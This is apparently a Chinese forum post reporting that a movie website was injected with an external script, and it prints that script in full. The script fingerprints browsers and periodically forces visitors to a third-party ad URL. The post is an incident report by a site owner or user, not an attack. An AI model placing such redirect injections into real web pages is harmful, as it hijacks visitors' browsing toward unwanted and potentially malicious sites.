被植入了,目前只有弹出广告。

电影 gqc.ink 植入的url https://abyss-static.anei.tv/js/adcgys.js function getMobileType() {   var ua = window.navigator.userAgent; //navigator.appVersion   return {     mobile: !!ua.match(/AppleWebKit.*Mobile.*/), //鏄惁涓虹Щ鍔ㄧ粓绔�     ios: !!ua.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios缁堢     android: ua.indexOf(“Android”) > -1 || ua.indexOf(“Linux”) > -1, //android缁堢鎴栬€卽c娴忚鍣�     iPhone: ua.indexOf(“iPhone”) > -1 || ua.indexOf(“Mac”) > -1, //鏄惁涓篿Phone鎴栬€匭QHD娴忚鍣�     iPad: ua.indexOf(“iPad”) > -1, //鏄惁iPad     trident: ua.indexOf(“Trident”) > -1, //IE鍐呮牳     presto: ua.indexOf(“Presto”) > -1, //opera鍐呮牳     webKit: ua.indexOf(“AppleWebKit”) > -1, //鑻规灉銆佽胺姝屽唴鏍�     gecko: ua.indexOf(“Gecko”) > -1 && ua.indexOf(“KHTML”) == -1, //鐏嫄鍐呮牳     weixin: ua.indexOf(“MicroMessenger”) > -1, //鏄惁寰俊 ua.match(/MicroMessenger/i) == “micromessenger”,   }; } var jumpurl = “https://hn.ci3xg.com/1022.html”; var jumpkey = window.location.hostname + “_adcgys_jmup_time”; setInterval(function () {   var timestamp = new Date().valueOf();   var jmup_time = parseInt(window.localStorage.getItem(jumpkey));   if (isNaN(jmup_time) || timestamp – jmup_time > 2 * 60 * 60 * 1000) {     if (getMobileType().mobile) {       setTimeout(function () {         window.location.href = jumpurl;       }, 3000);       window.localStorage.setItem(jumpkey, new Date().valueOf());     } else {       setTimeout(function () {         window.location.href = jumpurl;       }, 30000);       window.localStorage.setItem(jumpkey, new Date().valueOf());     }   } }, 1000);复制代码 会跳转刀https://hn.ci3xg.com/1022.html 还没看到哪里触发这个js

请登录后发表评论

    没有回复内容